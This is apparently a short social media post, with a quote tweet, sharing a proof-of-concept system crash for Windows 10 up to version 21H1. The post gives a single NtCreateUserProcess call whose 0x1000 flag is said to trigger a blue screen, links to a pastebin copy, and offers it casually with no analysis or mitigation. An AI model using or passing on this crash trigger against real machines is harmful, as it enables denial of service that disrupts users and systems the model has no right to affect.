Here is the POC:
pastebin.com/b2Z3Cdjf
Quote Tweet
Been lazy with the next anti-debug article so here's a BSOD for you (should work on most win10 up to 21H1)
NtCreateUserProcess(&proc_handle, &thread_handle, MAXIMUM_ALLOWED, MAXIMUM_ALLOWED, nullptr, nullptr, 0x1000, 0, nullptr, &create_info, nullptr);
magic is in the 0x1000
2
19
57



